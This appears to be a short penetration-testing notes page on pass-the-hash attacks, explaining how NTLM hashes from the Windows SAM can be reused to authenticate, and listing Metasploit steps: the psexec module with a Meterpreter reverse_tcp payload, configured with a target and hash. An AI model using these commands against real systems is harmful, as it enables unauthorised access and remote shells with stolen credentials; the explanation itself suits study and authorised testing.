1.3 KiB
General
Pass-the-hash (PtH) is a technique that allows an attacker to authenticate to a remote system using the underlying NTLM or LAN Manager (LM) hash of a user's password, instead of the actual password. This can allow an attacker to gain access to a system or network without knowing the actual password of the user.
On a Windows system, user passwords are stored in a hashed format in the system's local security database, called the Security Account Manager (SAM). When a user enters their password, the system hashes the entered password and compares it to the stored hash to authenticate the user.
In a PtH attack, the attacker obtains the hash of a user's password and uses it to authenticate to a system as that user. This can be done by capturing the hash through a variety of means, such as through a network sniffer, by extracting it from a compromised system, or by using a tool like Mimikatz. Once the attacker has the hash, they can use it to authenticate to a system without knowing the actual password.
Commands
Make sure you have gather some hash before starting this step and also have a meterpreter session
PtH Module
use windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
show options ---> Set the options (RHOST, RPORT, SMB DOMAIN.., USER/PASS or HASH)
run